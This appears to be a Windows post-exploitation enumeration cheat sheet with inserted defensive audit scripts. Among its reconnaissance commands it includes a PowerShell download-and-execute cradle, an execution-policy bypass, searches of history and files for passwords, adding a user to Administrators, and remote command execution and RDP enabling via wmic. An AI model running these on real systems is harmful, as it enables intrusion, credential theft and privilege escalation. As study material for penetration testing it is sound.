
Information gathering



System Information

sysinfo - [cmd / powershell]

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
System - [powershell]
path - [powershell]
windows defender - [cmd]
sc query windefend
sc - service control
Displays the domain name to which the host belongs (run from a CMD prompt)
Prints out the name of the domain controller the host checks in with (run from a CMD prompt)
echo %logonserver%

User and groups


my user

whoami /priv
whoami /groups
user - [cmd]
net user
net user <user-name>
user - [powershell]
get-localuser -name <user-name> | select *
get-localuser -name <user-name> | select Name,Enabled,LastLogon
group - [cmd]
net localgroup
net localgroup <group-name>
group - [powershell]
get-localGroup | Select *
get-localGroup | ft Name
user that belong to a group - [cmd]
net localgroup <group-name>
users that belong to a group - [powershell]
Get-LocalGroupMember Administrators | ft Name,PrincipalSource
write access on a service directory - [accesschk] (no trailing backslash before the closing quote, otherwise the quote is passed literally to accesschk)
.\accesschk.exe -uwdq "C:\Program Files\Unquoted Path Service"


scheduled tasks

schtasks /query /fo LIST /v
schtasks /query /fo LIST /v | findstr /v "\Microsoft"


list of processes that are mapped to a specific Windows service

tasklist /SVC


show all services running on the machine [cmd]

sc queryex type= service
show services [cmd]
wmic service
wmic service get name,startname
wmic service get name,pathname

show services [powershell]
Get-WmiObject win32_service | ?{$_.State -like 'Running'} | select Name, DisplayName, PathName
Get-WmiObject win32_service | select Name, DisplayName, PathName
Get-WmiObject win32_service | select Name, PathName
Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartMode | Where-Object {$_.State -like 'Running'}


Prints out adapter settings for the host.

ipconfig /all
Displays the routing table (IPv4 & IPv6) identifying known networks and layer three routes shared with the host.
route print
Active network connections
netstat -n
netstat -r
netstat -ano
Lists all known hosts stored in the arp table.
arp -a
Test connection
Test-NetConnection -ComputerName <host> -Port 80


Displays the status of the host's firewall. We can determine if it is active and filtering traffic.

netsh advfirewall show state
firewall - [cmd]
netsh advfirewall firewall dump
netsh advfirewall firewall show rule name=all
netsh advfirewall show currentprofile
netsh advfirewall show allprofiles

legacy netsh firewall context (still accepted on many builds, but advfirewall is the current syntax) - [cmd]
netsh firewall show state
netsh firewall show config
firewall - [powershell]
Get-NetFirewallProfile | Format-Table Name, Enabled
Get-NetFirewallRule | select DisplayName, Enabled, Description
Get-NetFirewallRule -DisplayName THM-Connection | select *

Installed Applications

application - [cmd] (Win32_Product triggers a consistency check of every installed MSI package, so this is slow and leaves MsiInstaller events in the Application log)

wmic product get name, version, vendor
updates - [cmd]
wmic qfe get Caption, Description, HotFixID, InstalledOn
windows antivirus
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
windows defender
Get-Service WinDefend
Get-MpComputerStatus | select RealTimeProtectionEnabled

Readable/Writable Files and Directories

accesschk.exe -uws "Everyone" "C:\Program Files"
  • -u to suppress errors
  • -w to search for write access permissions
  • -s to perform a recursive search
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}


enumerate all disks

wmic logicaldisk get caption,description,providername

Device Drivers and Kernel Modules

Enumerate drivers - [powershell]

driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
driver details - [powershell]
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

Binaries That AutoElevate

If this policy key is enabled in HKEY_CURRENT_USER or HKEY_LOCAL_MACHINE, any user can run Windows Installer (.msi packages) with elevated privileges.

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
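Added example (not part of the original notes): a PowerShell check for this setting that reads both hives the two reg query commands above look at. The value name AlwaysInstallElevated and the Group Policy path named in the warning are standard Windows identifiers rather than something taken from this page; the policy only takes effect when the value is 1 in both hives, which is what the function reports.

```powershell
# Added example (not from the original page): audit the AlwaysInstallElevated policy.
# Windows Installer runs MSI packages as SYSTEM only when the value is 1 in BOTH hives.
function Test-AlwaysInstallElevated {
    $paths = @(
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
        'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    )
    $state = @{}
    foreach ($p in $paths) {
        # A missing key or value means the policy is not configured; treat that as 0.
        $v = (Get-ItemProperty -Path $p -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        $state[$p] = if ($null -eq $v) { 0 } else { [int]$v }
    }
    [pscustomobject]@{
        HKLM       = $state[$paths[0]]
        HKCU       = $state[$paths[1]]
        # Only the combination of both hives is exploitable.
        Vulnerable = ($state[$paths[0]] -eq 1 -and $state[$paths[1]] -eq 1)
    }
}

$result = Test-AlwaysInstallElevated
$result | Format-List
if ($result.Vulnerable) {
    Write-Warning ('AlwaysInstallElevated is enabled in both hives. Disable it under ' +
        'Computer/User Configuration > Administrative Templates > Windows Components > ' +
        'Windows Installer > "Always install with elevated privileges".')
}
```

Run it as the user you are auditing, since the HKCU half is per user; a result with HKLM=1 and HKCU=0 is a policy to clean up but not yet a privilege escalation path.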

Directory permission

get-acl -path "C:\Program Files\Unquoted Path Service\" | Format-Table -wrap
get-acl -path "C:\Program Files\Unquoted Path Service\" | Format-List
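Added example (not part of the original notes) that automates what the accesschk, Get-ACL and get-acl commands in this section and the "Readable/Writable Files and Directories" section do by hand: it walks every service's PathName, flags unquoted paths that contain spaces, and lists low-privileged principals holding write rights on the binary's directory. Function names and the set of principals treated as low-privileged are my own choices; run it as an audit and fix findings by quoting the ImagePath and tightening the directory ACL.

```powershell
# Added example (not from the original page): audit service binary paths for the two
# weaknesses the commands above look for (unquoted paths with spaces, writable binary dirs).

# Principals that should never hold write rights on a service binary's directory.
$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users',
                       'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

function Get-LowPrivWriteAccess {
    param([Parameter(Mandatory)][string]$Path)
    try { $acl = Get-Acl -Path $Path -ErrorAction Stop } catch { return @() }
    $acl.Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $LowPrivPrincipals -contains $_.IdentityReference.Value -and
            # Composite "Write", "Modify", "FullControl" or the individual file-creation bits.
            # Generic rights show up as numbers and are not decoded here.
            ($_.FileSystemRights.ToString() -match
                '\b(Write|Modify|FullControl|WriteData|CreateFiles|AppendData|CreateDirectories)\b')
        } |
        ForEach-Object { "$($_.IdentityReference) : $($_.FileSystemRights)" }
}

function Get-ServicePathFindings {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName } |
        ForEach-Object {
            $svc  = $_
            $path = $svc.PathName.Trim()
            # Unquoted path with a space before the executable name: the service control
            # manager tries each prefix (C:\Program.exe, C:\Program Files\Unquoted.exe, ...)
            # in turn, so a writable prefix directory is a problem.
            $unquoted = (-not $path.StartsWith('"')) -and
                        ($path -match '^(.*?\.exe)') -and ($Matches[1] -match '\s')
            # Path of the binary itself, with quotes and arguments stripped.
            $exe = if ($path -match '^"([^"]+)"')     { $Matches[1] }
                   elseif ($path -match '^(.*?\.exe)') { $Matches[1] }
                   else                                { $path }
            $writable = Get-LowPrivWriteAccess -Path (Split-Path -Parent $exe)
            if ($unquoted -or $writable) {
                [pscustomobject]@{
                    Service     = $svc.Name
                    StartName   = $svc.StartName
                    PathName    = $path
                    Unquoted    = $unquoted
                    WritableDir = ($writable -join '; ')
                }
            }
        }
}

Get-ServicePathFindings | Format-List
```

StartName is included because a finding on a service running as LocalSystem matters far more than one on a service running as a low-privileged virtual account; sort on it when triaging the output.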
List of files, including hidden ones - [powershell]
ls -force


net view \\dc01 /all
net share

Logs and Events

get-eventlog -list

Harnessing PowerShell

Lists available modules loaded for use.


Will print the execution policy settings for each scope on a host.

Get-ExecutionPolicy -List

This changes the policy for our current process only, using the -Scope parameter. The policy reverts once we exit or terminate the process, which is ideal because we won't be making a permanent change to the victim host.

Set-ExecutionPolicy Bypass -Scope Process

With this string, we can get the specified user's PowerShell history. This can be quite helpful as the command history may contain passwords or point us towards configuration files or scripts that contain passwords.

Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt 

Return environment values such as key paths, users, computer information, etc.

Get-ChildItem Env: | ft Key,Value

Download a file from the web using PowerShell and call it from memory.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

Am I Alone?


Windows Management Instrumentation (WMI)

Prints the patch level and description of the Hotfixes applied

wmic qfe get Caption,Description,HotFixID,InstalledOn   

Displays basic host information to include any attributes within the list

wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List  

A listing of all processes on host

wmic process list /format:list  

Displays information about the Domain and Domain Controllers

wmic ntdomain list /format:list 

Displays information about all local accounts and any domain accounts that have logged into the device

wmic useraccount list /format:list  

Information about all local groups

wmic group list /format:list

Dumps information about any system accounts that are being used as service accounts.

wmic sysaccount list /format:list

Host Enumeration OS

wmic computersystem LIST full
wmic /namespace:\\root\securitycenter2 path antivirusproduct
wmic path Win32_PnPdevice 
Installed Updates
wmic qfe list brief
Directory Listing and File Search
wmic DATAFILE where "path='\\Users\\test\\Documents\\'" GET Name,readable,size

wmic DATAFILE where "drive='C:' AND Name like '%password%'" GET Name,readable,size /VALUE
Local User Accounts
wmic USERACCOUNT Get Domain,Name,Sid

Domain Enumeration Domain and DC Info

wmic NTDOMAIN GET DomainControllerAddress,DomainName,Roles /VALUE
Domain User Info
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='testAccount'" GET 
List All Users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname
List All Groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname
Members of A Group
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value

wmic path win32_groupuser where (groupcomponent="win32_group.name=\"domain admins\",domain=\"YOURDOMAINHERE\"")
List All Computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname


wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname

Execute Remote Command

wmic process call create "cmd.exe /c calc.exe"

Enable Remote Desktop

wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"


wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

Net Commands

Information about password requirements

net accounts

Password and lockout policy

net accounts /domain

Information about domain groups

net group /domain

List of users with domain admin privileges

net group "Domain Admins" /domain

List of PCs connected to the domain

net group "domain computers" /domain

List of computer accounts of domain controllers

net group "Domain Controllers" /domain

User that belongs to the group

net group <domain_group_name> /domain

List of domain groups

net groups /domain

All available groups

net localgroup

List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)

net localgroup administrators /domain

Information about a group (admins)

net localgroup Administrators

Add user to administrators

net localgroup administrators [username] /add

Check current shares

net share

Get information about a user within the domain

net user <ACCOUNT_NAME> /domain

List of all users of the domain

net user /domain

Information about the current user

net user %username%

Mount the share locally

net use x: \\computer\share

Get a list of computers

net view

Shares on the domain

net view /all /domain[:domainname]

List shares of a computer

net view \\computer /ALL

List of PCs of the domain

net view /domain


Dsquery is a helpful command-line tool that can be utilized to find Active Directory objects.

User Search

dsquery user

Computer Search

dsquery computer

We can use a dsquery wildcard search to view all objects in an OU.


Users With Specific Attributes Set (PASSWD_NOTREQD)

dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl

Searching for Domain Controllers

dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName
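Added example (not from the original notes) for the two dsquery filters above: the OID 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule, so the 32 and 8192 in those filters are single userAccountControl bits (PASSWD_NOTREQD and SERVER_TRUST_ACCOUNT). The flag table holds the standard userAccountControl values; the function names and the sample values 544 and 532480 are constructed for illustration, and the commented Get-ADUser line assumes the RSAT ActiveDirectory module is installed.

```powershell
# Added example (not from the original page): decode userAccountControl values and build
# the bitwise-AND LDAP filters used by the dsquery commands above.

# Standard userAccountControl bits (subset).
$UacFlags = [ordered]@{
    SCRIPT                    = 0x0001
    ACCOUNTDISABLE            = 0x0002
    LOCKOUT                   = 0x0010
    PASSWD_NOTREQD            = 0x0020
    PASSWD_CANT_CHANGE        = 0x0040
    NORMAL_ACCOUNT            = 0x0200
    WORKSTATION_TRUST_ACCOUNT = 0x1000
    SERVER_TRUST_ACCOUNT      = 0x2000
    DONT_EXPIRE_PASSWORD      = 0x10000
    TRUSTED_FOR_DELEGATION    = 0x80000
    NOT_DELEGATED             = 0x100000
    DONT_REQ_PREAUTH          = 0x400000
}

# Turn a raw userAccountControl integer into the list of flag names that are set.
function ConvertFrom-UserAccountControl {
    param([Parameter(Mandatory)][int]$Value)
    $UacFlags.GetEnumerator() |
        Where-Object { ($Value -band $_.Value) -ne 0 } |
        ForEach-Object { $_.Key }
}

# Build the same kind of filter dsquery uses: 1.2.840.113556.1.4.803 is LDAP_MATCHING_RULE_BIT_AND,
# so the filter matches objects where every bit in $mask is set.
function New-UacFilter {
    param([Parameter(Mandatory)][string[]]$Flag)
    $mask = 0
    foreach ($f in $Flag) { $mask = $mask -bor $UacFlags[$f] }
    "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=$mask))"
}

# Constructed sample values: 544 = NORMAL_ACCOUNT + PASSWD_NOTREQD (a user that may have an
# empty password), 532480 = SERVER_TRUST_ACCOUNT + TRUSTED_FOR_DELEGATION (a typical DC account).
ConvertFrom-UserAccountControl 544
ConvertFrom-UserAccountControl 532480
New-UacFilter PASSWD_NOTREQD
# Live query with the same mask (needs the RSAT ActiveDirectory module):
# Get-ADUser -LDAPFilter (New-UacFilter PASSWD_NOTREQD) -Properties userAccountControl
```

Passing several flag names to New-UacFilter ANDs them, which is what the matching rule does; to match any one of several bits you need separate clauses under an LDAP `|` instead.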

Automated Enumeration




  • windows-exploit-suggester
  • /opt/windows/windows-exploit-suggester systeminfo.out -i "Elevation of Privilege" -e > exploits.txt



msf> run post/multi/recon/local_exploit_suggester